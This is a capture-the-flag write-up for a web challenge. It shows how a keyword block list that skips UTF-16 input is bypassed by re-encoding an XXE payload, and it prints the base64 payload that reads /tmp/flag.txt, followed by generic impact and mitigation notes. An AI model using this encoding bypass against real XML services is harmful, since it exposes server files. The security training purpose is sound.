Featured image of post AI Image Generator - DOJO n°34
web

AI Image Generator - DOJO n°34

📜 Description

A new tool has recently been published, designed to generate beautiful AI images based on your given prompt. We have also made sure that it works to upload files if the prompt is in XML format! Will you be able to find the flag?

~ _The flag can be found in the file: /tmp/flag.txt

Note: The docker application do not have access to the internet

🕵️ Proof of Concept

The application allows us to send XML

1
2
3
4
5
6
7
8

# Check if it's instruction in XML
try:
    parsed_text = promptFromXML(data)

except Exception as e:
    parsed_text = f'Your prompt to get this fancy image: {data}'

print( template.render(output=parsed_text) )

Then the application base64 decode our input and it check if it is UTF-16 or not :

1
2
3
4
5
6

dataBytes = base64.b64decode(s)

    if (dataBytes[:2] != b'\xff\xfe' and dataBytes[:2] != b'\xfe\xff'):
        #Allow parsing for casual svg
        if any(x in dataBytes.lower() for x in [b'file://', b'tmp', b'flag.txt', b'system', b'public', b'entity']):
            return 'BLOCKED'

So If we send an XML payload in UTF-16, we can bypass the filter

1

$ echo "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///tmp/flag.txt'>]><root>&test;</root>" > pocxml.xml

Then convert it to UTF-16 using iconv :

1

$ cat pocxml.xml | iconv -f UTF-8 -t UTF-16BE > pocxmlUTF16.xml

Then :

1
2
3
4
5
6

$ cat pocxmlUTF16.xml | base64

ADwAPwB4AG0AbAAgAHYAZQByAHMAaQBvAG4APQAiADEALgAwACIAPwA+ADwAIQBEAE8AQwBUAFkA
UABFACAAcgBvAG8AdAAgAFsAPAAhAEUATgBUAEkAVABZACAAdABlAHMAdAAgAFMAWQBTAFQARQBN
ACAAJwBmAGkAbABlADoALwAvAC8AdABtAHAALwBmAGwAYQBnAC4AdAB4AHQAJwA+AF0APgA8AHIA
bwBvAHQAPgAmAHQAZQBzAHQAOwA8AC8AcgBvAG8AdAA+AAo=

We can now send the payload :

Thanks Pwnii & Brumens for the challenge !

🚧 Impacts

XXE attacks can be used to access sensitive information from the application or from the server on which it is running. For example, an attacker might use an XXE attack to read sensitive files from the file system, send HTTP requests to other servers, or even execute commands on the server.

🔐 Mitigations

XXE vulnerabilities can occur when an application processes XML input without properly validating or sanitizing it. This can allow an attacker to inject malicious code into the XML input, which is then executed by the application.

To prevent XXE attacks, it is important to properly validate and sanitize all XML input to ensure that it does not contain any malicious code. This can be done using techniques such as input validation, input sanitization, and input whitelisting. It is also important to keep the application and its dependencies up to date to ensure that any known vulnerabilities are patched.

📚 References

PortSwigger - XML external entity (XXE) CWE-611: Improper Restriction of XML External Entity Reference